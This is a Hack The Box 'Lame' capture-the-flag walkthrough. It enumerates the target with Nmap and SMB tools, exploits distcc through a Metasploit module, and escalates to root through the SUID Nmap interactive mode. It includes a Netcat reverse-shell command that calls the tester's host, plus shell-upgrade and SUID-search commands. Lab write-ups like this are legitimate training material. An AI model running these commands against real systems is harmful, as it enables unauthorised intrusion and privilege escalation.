Hack The Box – Lame Walkthrough
Introduction
This was an easy Linux box that involved exploiting a remote command execution vulnerability in the distcc service to gain an initial foothold and the Nmap interactive mode to escalate privileges to root
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
- -p- to scan all ports
SMB Enumeration
Using Smbclient to enumerate available shares:
The next step was to run a Nmap scan on ports 139 and 445 with all SMB enumeration scripts, to further enumerate this service.
nmap -p 139,445 -Pn –script smb-enum* 10.10.10.3
I then ran another Nmap scan to check for any known vulnerabilities within the SMB service. Nmap has a number of “smb-vuln-msxx-xxx” scripts that can be used to test the SMB service for public exploits.
No working exploits were found against this host.
Accessing the open shares using Smbclient, nothing useful was found
distcc Exploitation
Using SearcSploit to find known vulnerabilities in the distcc service – A Metasploit module was found
Starting MSCconsole, selecting the distcc_exec module, setting and running the exploit:
- RHOST to specify the target host IP address
- payload to specify the payload type, in this case the Linux CMD shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
The exploit has granted a command shell.
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Using Netcat to obtain a reverse shell with the target host:
nc -nv -e /bin/bash 10.10.14.14. 443
The following steps can be done to obtain an interactive shell:
- Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
- Hitting CTRL+Z to background the process and go back to our host
- Running “stty raw -echo” on our host
- Hitting “fg + ENTER” to go back to our reverse shell
Privilege Escalation
Checking for SUID and GUID:
find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000 2>/dev/null
Versions of Nmap between 2.02 and 5.21 had an interactive mode which allowed users to execute shell commands. Because the Nmap binary has SUID permissions, this could be exploited to escalate privileges to root.
Checking the Nmap version with: Nmap –version
Entering the Nmap interactive mode and using !sh to enter the sh shell
This has granted root access to the system.
Conclusion
This was quite an interesting little box, as the distcc service is used for speeding up compilation of source code so it’s not something you would expect to see open on a server.
The privilege escalation part was quite easy although it reminded me important updating software is.